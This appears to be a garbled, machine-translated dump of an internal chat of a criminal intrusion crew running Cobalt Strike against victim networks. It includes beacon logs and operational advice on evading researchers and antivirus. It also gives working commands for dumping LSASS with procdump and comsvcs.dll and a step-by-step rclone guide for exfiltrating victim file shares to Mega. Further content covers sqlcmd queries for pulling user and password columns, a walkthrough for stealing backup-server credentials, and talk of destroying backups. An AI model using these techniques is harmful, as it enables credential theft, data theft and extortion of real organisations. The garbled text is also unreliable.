root@kali:/opt/tomcat# sudo update-java-alternatives -l
java-1.11.0-openjdk-amd64 1111 /usr/lib/jvm/java-1.11.0-openjdk-amd64
java-15-oracle 1091 /usr/lib/jvm/java-15-oracle
java-1.8.0-openjdk-amd64 1081 /usr/lib/jvm/java-1.8.0-openjdk-amd64
```
I read that the problem is in the tomcat, I did not have it installed at all.
```
root@kali:/opt/tomcat# sudo systemctl status tomcat
Tomcat.service - Apache Tomcat Web Application Container
Loaded: loaded (/etc/systemd/system/tomcat.service; disabled; vendor preset: disabled)
Active: active (running) since Fri 2021-01-29 05:35:46 EST; 5s ago
Process: 34567 ExecStart=/opt/tomcat/bin/startup.sh (code=exited, status=0/SUCCESS)
Main PID: 34574 (java)
Tasks: 30 (limit: 6977)
Memory: 161.9M
CGroup: /system.slice/tomcat.service
└─34574 /usr/lib/jvm/java-15-oracle/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properti>
Jan 29 05:35:46 kali systemd[1]: Starting Apache Tomcat Web Application Container...
Jan 29 05:35:46 kali startup.sh[34567]: Tomcat started.
Jan 29 05:35:46 kali systemd[1]: Started Apache Tomcat Web Application Container.
lines 1-13/13 (END)
```
```
./cobaltstrike
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
Agent library failed to init: instrument
``they come on the tail of the link after the domain that adds the profileTurn off the profile xxxx.profile (aka trevor.profile)In general, the analyst sessions come from the profile of our https://pastebin.com/yB6RJ63Fкоторые pavel borisov and so on that for sessions kgbshnikhttp://www.domenburg.com/en/give the registrar of domains without docks for bitok except naimchipan ip servak that do not lomyaet through the domain reserchatopfy dohren sessions kgbshnikov poured, but in weblog them not, is it normal at all?[ ] (https://stylebrooks.com/group/general?msg=AoWMC9ZDEYra6fLyF) and I have the same, I thought someone from ours tests) look at the date of appearance of sessions it is not staging it just scan````
01/28 09:55:11 visit (port 443) from: 179.43.176.133
Request: GET /admin/index.php
Response: 404 Not Found
Mozilla/5.0
````
I've got all the same ones like this
01/28 06:07:07 visit (port 8443) from: 168.119.77.163
Request: GET /Gvh7/
beacon beacon stager x86
Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
01/28 06:07:07 visit (port 8443) from: 168.119.77.163
Request: GET /hIt8/.
beacon beacon stager x64
Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
01/28 06:07:23 visit (port 443) from: 168.119.77.163
Request: GET /qNm0/.
beacon beacon stager x86
Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
01/28 06:07:23 visit (port 443) from: 168.119.77.163
Request: GET /bApJ/.
beacon beacon stager x64
Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
01/28 06:07:42 visit (port 443) from: 204.16.247.101
Request: GET /lHu3/.
beacon beacon stager x86
Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
01/28 06:07:42 visit (port 443) from: 204.16.247.101
Request: GET /PTRg/.
beacon beacon stager x64
Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
I won't be here today, I'll look into it tomorrow. Don't worry, it's because the stepping was done via host, i.e. before if you scan domains no stepping was done, on 4.1 also had xxxxx profile, but it didn't come out this way, so it's probably not the profile either, i updated the listener completely via domain+4.2 and flew[ ](https://stylebrooks.com/group/general?msg=BoZDp6notprCAFiWm) we have the same one, when the whole thing came through the domain) i switched the listener to the correct one i got this problem when in fact i have a different one but the situation is the same!profilenow I'll find out what small profile[ ](https://stylebrooks.com/group/general?msg=cA98oC4F5asoCBJxg) more likely whitelist is needed. they are random virtuals\processes slutserversion timserversion alonetoday it looks like in 199 there is no such a dependence in the 104 band checked + 1 give minutes, the russian come and go with the ssr also
1v1 pictureWhen we were given version 3.0 back in the year, there were already analysts flying in
01/28 03:46:14 *** new ssh session ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 04:16:16 *** initial beacon from ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 04:46:17 *** new ssh session ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 04:58:13 *** initial beacon from Administrator *@172.16.1.113 (WIN-3AI1DIQI7NN)
01/28 05:16:19 *** initial beacon from ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 07:46:40 *** initial beacon from vasiliy *@82.69.71.9 (ASIM-28C7A0185)
01/28 08:16:42 *** initial beacon from vasiliy *@82.69.71.9 (ASIM-28C7A0185)
01/28 08:46:44 *** initial beacon from sidorov *@82.65.84.9 (ASOV-3EFCDFBD74)
01/28 09:16:46 *** new ssh session sidorov *@82.65.84.9 (ASOV-3EFCDFBD74)
01/28 09:46:48 *** new ssh session sidorov *@82.65.84.9 (ASOV-3EFCDFBD74
```
This is just for today, Moscow time. Change the channel to RenTV.
conspiracy, theory, masons - what awaits us with the new update cobalt :) if there will be no false sessions - it means it's in the cob 4.2
and there are no options there 4.2 version without hookup
sit back to wait for a hoster to get a cob 4.1mechanics how to check it just so and why?
have you seen the logins of other users on your timeserver?
when you connect to a timeserver as a client, authentication data could leak out to the left or some dumb hdv and why does it do that?[ ](https://stylebrooks.com/group/general?msg=6n5utLviu44RCXCFk) when you start the listener, it sends information about them somewhere. what is the secret tab? there could leak data from timeservers you connect to, like blackheats and software - back up!ovner maybe pawned himself =) i asked about the bookmark) like yes it was on the cobalt 4.2 began to happen, no? and by the way the searchers usually come upon a grid mess, find the paiload, begin to investigate
i've never seen a session fly right after the listener went up and it's a pain in the ass to take registrars' accounts and transfer level 3 domains to my own backend
it's possible to "hide" that's how to do it in different places where you can't pay with bitcoins only
it would be good to have a script for whitelisting sessions and unpacks. like, if a session came in - let it go
```
in #cobalt_cna_scripts there is blaclist[ ](https://stylebrooks.com/group/general?msg=QqDS3SJWEfDu4mup9) through nymchip took as well as our hosterv kobe)periodicallyweb logs of webservers you already see, before the hoster I myself bought servers in different places, domains and setapil everything, the same analytics would fly over and look logs of webservers, who has ssx on the server have gaps or not?and they were like, ok, so the domain is not for malware and they will go on and on
you have a session whitelisting in blacklists, probably immediately after the registration of the domain to do it on the fly, but the troublesome arranging a wild script would be nice to pump some whitelisting sessions / ipaks. like came the session - to let her not to let him sam kobalt by the way have not checked for bookmarks? you can look at the web servers, if they are available
if a pile of requests comes right after you release apache/enginx, the reserchers probably know everything beforehand, someone in AV company figured out how to automate it and that's it.
the server and 2 procl at another registrar for the sake of experiment and look - if it will not bang with the same profile, it means that the registrar leaks and yes, the server just set up, setup the listener and the session went a sample shellcode they have, I have a conspiracy theory and still do not care, but my profile is not the same as Vastoni, Technologist, Red - do you also take it there?I order from our hoster is unlikely it has any effect on anything) dishonest? i myself am curious but have not got time to dig around) most likely it's about the profile, yes
the server response type in the scan to the client ask viola he will explain in more detail) something fishy it's all, I thought it only nastiak you have a session rises
one thing is just a web redirect comes in the coba, another thing is when they bring up a session to you on the domain that did not show up anywheretypes scan and poke then statues collect botnu alt said that all newly reg domains reserchatnu is clearly one and the same group reserchers, how do they knit newly reg domains and comes knockout to paiload that was not used?we also have two servers attacking clean, domains because they are new in the padding, so analysts are attacking them to collect status on cobaltprofile k2 use ?@alter how can this be ?all sorts of kgb makarovs are knocking around and the server is also plus or minus new and nowhere to show upxxm, we have the same fuck with cobalt, for at least a week now and again i have beacon released the dll; and here new ssh session, and what does it mean and from where is not clear never happened before to garbage after checking rantime all i did was check the dll on dyncheck for windef and sophos rant, and that's it)and the server and the pad are new; i just bought and started the timserver
01/28 05:07:58 *** initial beacon from mihailov *@70.9.51.51 (ROLOV-49C20F4489)
01/28 05:37:59 *** initial beacon from mihailov *@70.9.51.51 (ROLOV-49C20F4489)
``I keep getting some garbage spawned and immediately die; everywhere new ssh session and russian surnames````
01/27 21:11:55 *** new ssh session makarov *@70.9.50.56 (EDOR-1B5C7CDB30)
01/27 23:44:39 *** new ssh session sobol *@68.69.70.9 (OR-18714C2795)
````mozhetku tell me, run timeserver, server itself is new, linux also; the file has not loaded anywhere po rocket fell? @rozetka thanks will try Although it may work for the context polzak, then impacetto if psekez.ru with hash and there interakt shell be
long time ago i used to use the read function copy the code of the hashpowershell[ ](https://stylebrooks.com/group/general?msg=j5mH5nHMqc8XNAbmt) psexec \host -s cmd thank you, it worked!@rozetka tell me how to psexec pozhtaa, this is really useful, if there is no gui.... also through psexec was started and dumped, if the database is opennu there already who likes whathttp://github.com/GhostPack/KeeThief/blobaster/PowerShell/KeeThief.ps1
powershell ISE can still export the CSV with the CSV codeNow it's open, you kinda passed the authorization)) so easy)) try it in the keepass itself ?File-export and there where you want to golf Access to gui ? @all help @green
urgent question nid help! tell me how to dump open keepass having access to tachkeda and allbatnik strtani through gpon viam 445 open , access denied all accounts or everything is also nada? on viam, anything open? not through default psekez vmik staszkili to it?
Who knows about GPOs?
Got the rights yes
There are two machines on the network - the Veeam server and the IT guy's machine
The task to get to them
The IT guy is completely closed (hostname by name detected, pinging, but ports are closed)
What options are there to get shell on the machines listed above?
In fact, the whole case is stuck in this place.and the native task manager is not removed or what? @red will share with the lambchop? I think we will need ... @all call back who in the near future will need to distribute/execute the file
there is an upgrade-automator that requires testing by the userr then kz how to dump it so i dont even have a local admin *rukalytso * yeah and throw plz output whoami /rriv either because yuak blocks or kzto that cilance does not palit it exactly, but we through shel did not go, because privilege debugtam not work recompiled libs to work with winapi
to unhook the engine cilansadumper2020 approuvedCMD software from the folder where the ehe lies openprocdump64.exe -ma lsass.exe lsass.dmpprocdump will cut the lsass even wonder if it will work or notsam compiled yesterday all night fucked try to run from ndp from admintaskmanager even not from adminnu we ended up not removed, but if you ndp there is a chancerundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\programdata\intel.log full
mimoshes funny1111 we've been fucking around for 3 or 4 days lol enjoy it) rdp local admin :) ahahaha no session how do i unload the lsass from the pc where the cilance is ?Pass in config is encrypted in b64 kind of way, so config is better to generate it separately somewhere through rclone config, then just copy it. how can you specify pass from config file? *Mega is a cloud storage and file hosting service known for its security feature where all files are encrypted locally before they are uploaded. This prevents anyone (including employees of Mega) from accessing the files without knowledge of the key used for encryption.* In general, as I understand the files are all encrypted locally before they are uploaded, so there is no need to make encrypted archives.then with the same wmic you can check if the process is running, if it is, it works ok wmic /node: "HOST" /user: "home_log" /password: "passport" process get description,executable convenient to feed the necessary files via sms to remote hosts, and then wmic startconfig after generation can be placed near exe and run it with parameter --config, for example rc.exe --config C:\Users\Administrator\rc.conf copy "C:\Users\Administrator\" mega:data, remote is the name of config, which you generate through rclone config, if the name of config you specify for example mega it will be mega:data,` guys, I tell you how to use rclone:
1. download the program itself (posted in general), create a file rclone.conf and put it in the same folder with the exe
2. Next, open the kmd from the admin, go to the folder where the program lies with the configuration file and run the command: rclone config
3. Then pop up menu, where we create a config (roughly speaking, roll in the gods mega), after the gods rolled in, the program writes them to the file rclone.conf, in encrypted form.
4. Take this rclone.conf file and the program itself and put it on the host from which we are going to download the information.
5. Fall into the cobweb into the folder where you put the config and the program and run the command:
shell rclone.exe copy "\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
Well, I think it is clear here, what is in quotes is what we download, we can specify anything, even the whole disk
remote - the name of the config file you specified in step 3, data - the folder in the mega, where the info is downloaded
Thank you ``so naturally).confgenerate usually on their virtualtoolkot you and silent installation and next to lay and startconfig generate manuall on silent installation pklon? @all no one wrote a query yet automatic database mssql ? query the database, tables and a couple dozen lines of the first 25-30 most live would be very helpful ...but I sit by the way with the web, all ok ( browser Opera )[ ](https://stylebrooks.com/group/general?msg=roaTx9kZx6Yqmw9YA) and now with proxychains \ proxychains4 can the same stuff, I have to reload the page if you see that there are new messages ... web version with thor sadness sadness
the appa is ok. you can proxy it (it used to be possible)[ ](https://stylebrooks.com/group/general?msg=3v2TAiW78aF9qvLYq) i have the menu always hidden, clearing cookies helps, but it goes around, the web version seems to be unstable i have everything ok. why rocket so fuck tweeter who is this and my batts also there part of my kobu who is this@all https://twitter.com/AltShiftPrtScn/status/1350755169965924352
change the mallable profile господав desktop without bugs works fine through the web version bugs were before the server update, the desktop version is all ok[ ](https://stylebrooks.com/group/general?msg=LxJGLqnzMJGsdSYkn) I was also offered to update tor, and then restart + click on the scoop to clear the then if the web browser cache cleanse mb help Restart did not help, the same bug.me all ok...helped, thanks) i had the same, restart toruspisk in place i had the same problem with the restart of the torispisk, but i got kicked out of the chat. forced logout.((guys, all normal rocket work? i sit through the web, and i have a bug list of chats on the left and disappears in a second it will rip, about restore i do not know have tried deleting backups from the central viam where the button delete backup from the drive - it then rip is removed and will not restore? slice + @all All Who WORK WITH SONICWALL's
Please, when I upload new dumps take them AT ONCE, because web-sessions for authorization tend to run out fairly quickly, as soon as I download the archive with sonic - immediately try to get if there 2fa, first just via vpn - if the code falls out - then climb through the web-session in the admin and look whether there rndp or something like that to start upbro I was sick, do not know anything@all wrtdesign.i can't see the confab, there are fresh sessions with sonic from there we're streaming) subscribers were not happy with the old chat room (pun intended, bro) "like" likes all now there will be twice as many locks with this chat roomintuitively everything is clear and nice smiley:update passed and should be faster beautifully)@all UPDATED@all the rocket update will now
a little delayed a little bit) don't give a shit :joy:= )just kidding) m? la the feds are upgrading the sniffer again @all it's time to upgrade the rocket
don't be scared) it will go back up in no time) @all THIS IS IMPORTANT
started noticing crookedly configured listener in other people's cobalt
it is RIGHT to write the domain of the pad both in HTTPS hosts and in HTTPS Host (Stager)
if you write ipac with htts host (Stager), the shaping process goes "bypassing" the SSL certificate which is on the pad - which is FUCKING and adds blockages by phasers if you have viam, check it, it should be there...i know viam has one, but a third party, you need to look.... da, like a viewer for the tank? no, there is some guye tool which goes straight to the tank to look
I just forgot the name completely(((shell sqlcmd@allHi, can you tell me the utility that sql .hello, could you suggest a utility that opens the sql . bak file@all today I'm distributing cases for work, who is not busy - write to your teammates and we'll watch ipnchiki sitelefantа you can also use maxtom browser router from the soul you can use desktop client we think so bypass the server from which you try to get in the date put January 1, 2021 guys, salam, urgently, how to bypass the old version of adobe to get into the scope ` ` `https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/
```
nice article about lateral muvGetting access to the server with Shadow Protect SPX (StorageCraft) backups
```
==
1. Log on to one of the servers via RDP, in my case is the SQL server.
2. On the desktop, we see the icon of ShadowProtect SPX
-> click on it.
3. the GUI opens (if you are prompted for credentials, enter the credentials under which you signed in via RDP, or any other software)
4. On the left side in the "Job Summary" block you will see the detailed description of backup scheme
In the "Name" field - backup name of our server
in the "Destination" field - place WHERE our spx stores backup copies, as BACKUP NAME (BALL WITH BACKUP ON THIS SERVICE)
From our example we can conclude that all backup files are stored in a ball named StorageCraft, and the folders with backup servers are named with the name of the server itself.
5. Knowing the name of backup server, we want to get more information about his structure, the first thing we do is to get a balloon with the command "cmd.exe> net view \\\COH-DSS3 /ALL", in response we get "Error 5: Access Denied".
6. No access, trying to bang on the accounts of other people - the answer is the same - Error n 5, it would be logical to assume that in order to gain access to the server, we need either the credentials of the local admin on this very server, or account of a special user with special privileges
7. Let's assume that if it is a dedicated user, he has a similar name to the software/function:
we go through the logins with substrings (here we need to get fancy):
Storage
Shadow
Protect
Craft
SP
SPX
Backup
BUUser
ETC.
Then do a search for ntds.dit (hashes.txt.ntds) to find the hash, in my case, the search was successful and I found the user Humanity.local\SPAdmin (I think it is clear that it is Shadow Protect Admin) and its hash ce31b806821bec116ba03132ab5b3138, but unfortunately, search on cmd5.org not result and I desperately need the clearance. (If you have enough hash, congratulations - you got the result.)
8. But if you still need a clipart or you can not find the right user, we understand that if the software somehow knocked on the server, she knows the credentials, which means they can stay on the server.
Try to dump hashes
Here I will not describe in detail how to do it, but you should try hashdump (and its legitimate analogues) and logonpasswords (and similar)
In my case I used mimic and saved the passwords and found the clirapass from my SPAdmin account - kerberos:
* Username : SPAdmin
* Domain : COHBackup
* Password : Backup!User
(in my case for some reason the domain was not Humanity.local but COHBackup, although you can also knock with Humanity.local (replace it with your own value))
9. Going into Explorer, and open through it the necessary sphere "\\COH-DSS3\StorageCraft" at me asks for credentials, I enter COHBackup\SPAdmin and Backup!User and successfully get access
10. Also in some networks backup servers can be a few, as an option to check this, is to click on the button Backup in the upper left corner of the gui (just after File) then Destinations -> and we will see what is the way to save the backup
===
Not sure if this method will work for everyone, but in my case it worked, good luck!
``Githab Links can add a forum section where you can drop off useful sites, links, articles, etc@all I often go to everyone today, which is unusual, but one more announcement.
i wish to collect some pool of similar documents in public access so that everyone could read them, they often describe fairly standard things, but it's useful to know them allInject into sqlserv.exe process or any other process run from under this user when working with databases you need either creeds or skl token of service user on the database server yes, here is the instruction if you do not have on the whim
```
1. Display all the databases on the server in kmd
sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
You can also add a port
1.2. to view a non-standard port from a skullserver, you need to type | shell netstat -abno | = scan ports and services on them through the cobald
there you find the port | sqlservr.exe | is running on and specify it after localhost like this - | localhost,12345 |
1.2.2.Display in kmd all databases on the server with size in megabytes
sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"
2. Unload the 100 most saturated tables in the database by number of rows, number of rows and size of tables on disk
sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;"
3. Counting rows in a specific table of a specific database
sqlcmd -S localhost -E -Q "select count(*) from %databasename%.dbo.%tablename%;"
4. Unload the first 10 records in a specific table of a specific database
sqlcmd -S localhost -E -Q "select top 10 * from %databasename%.dbo.%tablename%;"
sqlcmd -S localhost -E -Q "use %databasename%; select top 10 * from %tablename%" -W
5. Search by column names in a specific database using %pass% as an example
sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';"
6. Dump the contents of specific columns from specific table into txt file on hard drive in folder (in this example by number value of table > dates
sqlcmd.exe -S localhost -E -Q "select UserKey, EmailAddress, RealName, Phone, FirstName, LastName, CountryName, CreatedDate from %databasename%.dbo.%tablename% where CreatedDate > '2017-11-30';" -W -s"|" -o "C:\temp\123.txt"
7. Output all tables of a particular database
sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W
8. Backup database
sqlcmd -S localhost -E -Q "BACKUP DATABASE name TO DISK='C:\PerfLogs\name.bak'"
for remote/other local server change localhost to ip,port
alternatively localhost,%port% (watch netstat)
+
9. to choose a non-standard port for the mscl, type ip,port = localhost,52541 example
+
``I'll either add something myself or ask the guys @tony to write a topic there, make a request instead of password, put any other key
and the variable %databasename%Search by column names in a particular database by the example of %pass%
```
sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';"
``Forum is great, I personally lack detailed information on working with skl databases only, with examples of tables and records that interest us@all about the forum, write friends, do not be afraid to say or ask stupid, usually if someone has a question - it will probably be several other people, and having it written down for all will be usefulkalinkaGentlemen, who used Headless Burp and can help, write in PM, please.mine added@all standardpro.com whose case? where's the conf? @all who wrote asked to cut the forum - duplicate in private now in half an hour will doPisplayed in pm.@all guys hello, I remember who wrote about copying pklon information from the mega to the dedic, write to lps there are a couple of questions who did so today this rocket will probably fall off a few times, it is planned if anything, do not worry all hello.++++:v:hello
The structure is as follows.
The current squad is divided into groups, each group is assigned to a team leader (one or two, depending on the size of the group).
Ateam - team leader rozetka
Bteam - team leaders red and ali
Cteam - team leader steven
Team Leaders' area of responsibility includes:
1. Issue cases for work
2. Teach, advise, mentor.
3. Connect in the process of solving atypical or unprecedented tasks
4. Help with builds of loads, fixing in the network and other technical questions concerning the software.
5. Provide the necessary guides and manuals.
The working group is required to:
1. Listen to
2. Watch
3. Doing
4. Learning
5. Asking questions
6. Follow guides and instructions, complete tasks
The approximate rules of procedure are as follows.
- Received the session
- Captured primary data
- Create a channel in the rocket (all have this feature), the channel name is the full primary domain case (eg google.com microsoft.com), add me + your group teammates there
- Fill the channel with primary information according to a given template (the domain adfind output, the list of domain admins, foreign admins, local admins, kerberos hashes, seatbelt output, sharefinder output, etc.)
We work from 15 to 01
From 19 to 20 we have a public debriefing in the discussion channel. Any questions of technical nature there too. On organizational questions - write to personal.
``mrFlintstonesstakanbradtwinalexstevenredgreenwhiteAndyflyAraratmagaalialterrozetkaShvedmichaelgiovannisamueldlit would rub...and do not pliz leave it on the dll if there is an option not to do so btw accepted.If the session injected into the process - it will not fall
if you leave it on the dll - it crashes after a few hours
while these are observations) I checked on a couple of servers - there was no reboot, but the session fellaprobesthe next time, as you restore the session, look how long the computer is running, something like this:
` `(Get-Date (Get-Process explorer).StartTime).ToString('yyyyyMMdd')[ ](http://wfy76wigkpoxqbe6.onion/group/cobalt_v42_patched?msg=xu2Q4qYAAed7PbQ7S) As I understand it separately in some networks, apparently something in the iron I had 2 times, on several machines in 2 networks ... but perhaps, as noticed - was restarting the servers, I did not watch the life of the computer[ ] (https://stylebrooks.com/group/cobalt_v42_patched?msg=3Fe4AGJ8mLf4nfGnm) was such, when a big slip put for 10 minutes from sleep mode returns. on vorkstantsyya possible, servaki usually reset dies, it is in memory but the technologist asks about the otherReal after restarting the computer session should die?) a follow-up question - how to remove jitter 300 seconds? i got tired of accidentally dumping my session to a slip and in 3 or 4 hours the session crashes. does anybody else crash sessions at night for no reason?zvhhitechTyrara senkeeset file security, sugnature - win64/rozena.ICt just what's here@barabulkaVanoATXGrimnir on 2016 server the dll ran, everything okhttp://dyncheck.com/scan/id/0e85df67f128617619f46255d62b1a1e
1/23
AhnLab V3 Light of some kind is giving dynamite detection checked on dyncheck dll x64 on 2008 crashes eheCodeocta0dayinbizhttps://dyncheck.com/scan/id/5b13716a94a301b0faef2dd60ef09b07#collapse_infoокточки input for dll
```
DllRegisterServer
DllInstall
DllUnregisterServer
Control_RunDLL
``@all working update
I think I need to test it on vin 10 and fix it on 7, same story on 12, same story with both folders tested on 2016 server x64 without AB
i also noticed the size of the dll itself increased 4 times compared to the dlls from the previous artifact
x64 as well as x86 is much better than previous artifact.
360 Total Security Essential palitoto here take it down? if so - add it in the new confuA how is the situation here? i do not understand in the other rocket i do not see this case i know i have it, but i do notprivet, and when we and alex will be given the dedicates and servers for the msf? We're waiting foroxox I'm about two months away
Fuck.
Fill it up and I'll delete the room.
we're stuck in old records, nothing's been uploaded yethttp://www.veeam.com/exagrid-storage-solutions.html
who has dealt with such a thing? it seems likehttp://www.carbonblack.com/блек some othertosofos not so evilsantinelcylantecsimantec palitosofos - simantecHello all
advise AV, the utilities are the most evil that stinks everything
for the testovaa von, got the spvc thanks the output should be something like this :
``beacon> shell net helpmsg 5
[*] Tasked beacon to run: net helpmsg 5
[+] host called home, sent: 44 bytes
[+] received output:
Access is denied.
``you forgot the shell in the commandb> net helpmsg 1326
[-] net error: argument 'helpmsg' is not a net commandnet helpmsgnet helpmsg (# errors)and so is 67 writes[-] could not open \kumerafil2\c$\*: 13261326 and 67 what does it mean who knows the error codes in the cob? +http://rus-linux.net/MyLDP/consol/7z-command-switches.htmlпосмотри. maybe there will be something here if I am not mistaken usual 7zip can be used as a portable, I downloaded the usual and a folder of 5 files dragged to different cars everywhere workedconsolehttp://portableapps.How can you check if trust is alive or not? if it's not worth the hassle ? on his cludes and in general azur has something that if you deleted it can be restored in some time ? look systeminfo
azzur's boxes have some signs that are certain find where they are and that's it should be written where he poured bekapyna I say not like you may server itself in the cludes azurai came to the conclusion that it is in the cludes azur because they are on the screenshot pin that need to change the job or delete bekapytam like 235 gig was, i had 32 copies and i don't know where the fuck it is, it was late, it was at night (i mean the drive without a letter) i fucked up NAS, local backups too, and it lets me roll backups, usually if the system is azure it says the folder is called windows azuredisk management open it, there will be an unplaced drive with the backup therewindows server backup saw how it works?you see how it works? it's not like they'll roll it back and fuck it up. you can't block it? well, the windows server is local where your backup agent hangs - it's probably the azure cloud server. the shit on the screenshot is usually a local backup server. you mean the azure server in the cloud remotely in the azure cloud cloud service. it's like https://www.pvsm.ru/images/Windows-Azure-Recovery-Services-chast-3-rabota-s-Backup-Agent-17.png what do you mean by servera azuranu not on the servera azur what do you mean bekaps somewhere in the cloud, lookup then how it worksetazur bekap agent how it looks like that there is nowhere to ask for authorization wife can go to the desktop application if you say it is there and where in the browser on the site azur?either not mail, but domain username, try domain mail and domain passstam ldap authorization in browsers nemoginov in the application itself uzura and in the service voidonu not specified anywhere there need at least a login to knowiibo it is most often under CCOv ashur cloud you will most likely get one of the domain admins that is not always available or there is another tool or just look for an account with admin pc?and it helps? I can't find it in the application://prnt.sc/vlu4i8guys, what are the options to get the account of the windows azur backup? the application itself is authorized, it probably works on the api, you can rip the account out of it or neon is not rehiddenThat? transferred? if so - add to the group on the simantek was a pass, I gmer shut down the processes and the folder simantek main removed from the pc) thus, but at least the exe it detected before, after such manipulations stopped and is nowhere in the processes after the demolition reboot simantek? if you have not rebooted, sometimes there is still an avr, but if you reset, everything that was in the lsass will fall out and you will have to wait again for someone to authorize you
hashdump may try and local hashes...simantec was, but i had to take it down, i am googling, but i still do not understand, privilege::debug is written, was it made on 2003 server? maybe it detects lsass and crashed the dump
did you try google the error? did you do privilege::debug? originally not) but then exactly x86 and the same error did you run x86 mimicatz for sure? hello gentlemen, who has met may be why the dump does not decrypt mimicatz:
```
Opening : 'lsass.dmp' file fr minidump...
Error kuhl_m_sekurlsa_acquireLSA ; Modules informations
```
I shot through procdump with windows 2003 it seems that there is no analog VNC no avs? Hello, anyone familiar with AWS, there is a network with access to the AWS lk, there are virtual machines, it created a user with the rights, is it possible how this user (newly created) to put in the domain, then on the rd to get in with the creeds. I have not dealt with this before, read the manual, did something, but alas, no luck so far, there how? I understand, in touch, let me know how things go and let's move on with these mebusi already a week to do the session prokitelst what to do?ok, i'll keep trying to sneak the network hello, i'll be in touch ok, i'll get it right away@stakan take it for yourself right away stakanAbout 2 months this case lasts? did you see? what about grandpa@all the contents of the LLVM folder overwrite the contents of the brooks-artifact-kit folder
entry points for rundll32.exe for generated dlls
```
DllRegisterServer
DllInstall
DllUnregisterServer
Control_RunDLL
``BugSuper``.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 219946 bytes
[+] received output:
EntryPoint found
[+] received output:
Injected.
```
with parameters -m local everything works great on the machine with the session (injector,massinjector)yes, near the corresponding .cna script before you had to put it in the cobalt diru tell me where to replace these boff files, where to put)? ah, ok))) and now they will work even better they workedwait, and if injectors worked?) just replace it and everything should start
the only Bofy cna not changed? oh_o found@all Urgent update your BOF files injector, builds that are in work since monday this week with the old injector will NOT start and do not forget to reload do .cna script@all IMPORTANT
ARTIFACT KIT UPDATE
Everyone download the archive and replace the files in the folder "over", all files! I'm all ready to go! restore the computer after cleaning and formatting softswitch and otpisheponyal, I will storm it) well it's okay, he wrote, silent pokapishy steve if they did not give ′ nishtyakdali server did not give anything yet?hello + @alter need to reshoot@alter need to reshoot vidimov all the credits nevalidu steven was worked up, what to do? idle sit that network is dead, do not know what to do with it
alex also looked into it and he doesn't know what to do.
No vulnerabilities found on ms17.
only polzak's creds, no brute force to admins, no local or domain one, i saw mimicatz myself, password from polzak, hashdump did not get anything
vyacheslav kerber rez to chat with the network, from chrome did not pull anything interesting there is nothing, there are crosses from polzakov valid, but the admin pass not a single come up, on the ms17 deaf doo so brandon how are you doing in the network without anyone alive ? so what anyone do hello there is 1n, only session is not available you have only 1 server like you do how long ?i thought we were going to do the lock grid, the one that wrote the glass, what are you doinga hello, i'm looking at the same grid you gave me guys write down who's doing whattv all hey guys will be 3-4 hours, i need a break in the morning here:flint write me back as soon as the channel is createdmain windows/beacon_https/reverse_https 142.202.205.88 443 142.202.205.88mainbrandonso sorry, stupid ipi that, port 443britz listener, not access to cobalt123123098qwepoi195123.213.122 port 35464sessione youbrandon give you listenerFLYNT wait listener in the network channel`` \STORAGESRV.ecampus.com\c$\Program Files\Barracuda\Barracuda Backup Agent\database
see backups
Should I mark such things here? Should I look at the backups at 600m? If so, what to do with this one ? i'll give you a new one on ecampus.com. i'm climbing )paralleyno do it flint now i'll find you a new one too as you say let me find you something small climbing through hosts looking for something interesting guys sign in with youstakan keep the net so who is busy sign in with youcbrad went away so he will be here soon so who is without a task hey hey@steven will be late today - lay in the morning, broke the arabs with a twin
